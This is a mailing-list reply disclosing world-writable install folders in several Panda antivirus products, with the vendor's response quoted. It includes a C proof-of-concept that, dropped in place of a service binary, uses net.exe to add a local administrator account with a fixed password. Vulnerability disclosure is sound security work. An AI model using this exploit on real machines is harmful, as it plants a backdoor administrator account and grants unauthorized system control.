Re: SECURITY.NNOV: Panda Platinum Internet Security privilege escalation / bayesian filter control security vulnerabilities



Panda is realy great and realy fast. The Bug was also reported at 16.07.06 to the beta team.




-------------------- 16.07.06 --------------------

Hi there,

i think there are some badly set filesystem permissions in your software.

FileSecure 7.01.10
C:\Programme\Panda Software\AVNT everybody full access

Titanium 2006 (5.03.00)
C:\Programme\Panda Software\ everybody full access

AntiVirus 2007 (2.00.80)
C:\Programme\Panda Software\ everybody full access

Platinum Internet Security 2006 (10.02.00)
C:\Programme\Panda Software\ everybody full access


it is possible to place a binary in the directory and let it execute at startup
as an service with system privs.

example for AntiVirus 2007 (2.00.80):

build it an place it in "C:\Programme\Panda Software\Panda Antivirus 2007"
for english Windows Version Porgram Files or somethin like this.


// --- pavsrv50.c ---
#include <windows.h>
#include <stdio.h>

INT main( VOID )
{
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];

GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add", szWinDir );

system( szCmdLine );

printf( "Adding user \"owner\" to the local Administrators group...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner /add", szWinDir );

system( szCmdLine );

return 0;
}
// --- pavsrv50.c ---


sorry for my bad english :)

testit on german windows xp sp2 all hotfixes and german windows 2k sp4 all hotfixes


btw. check the " if you install services

--------------------------------------------------


BTW: FileSecure 8.00.20 has the same vulnarability

I think the best solution is to change the AV Produkt.


Panda answer:
----------------- 21.07.06 -----------------------
Dear beta-tester,

Thank you very much for joining our beta program and reporting your tests so far.

We comment you that "Panda Antivirus + Firewall 2007" and "Panda Internet Security 2007" have a Shield to protect its processes and files.

All incidents and comments received will help us to build a better product.

Please, do not doubt to report us any other incident or query that you may have.

Best regards,

Beta Area
Quality Assurance Division
mailto:beta@xxxxxxxxxxxxxxxxx

Panda Software
Protection against viruses, spyware, hackers, spam and other Internet threats
Buenos Aires, 12
48001 BILBAO - SPAIN

--------------------------------------------------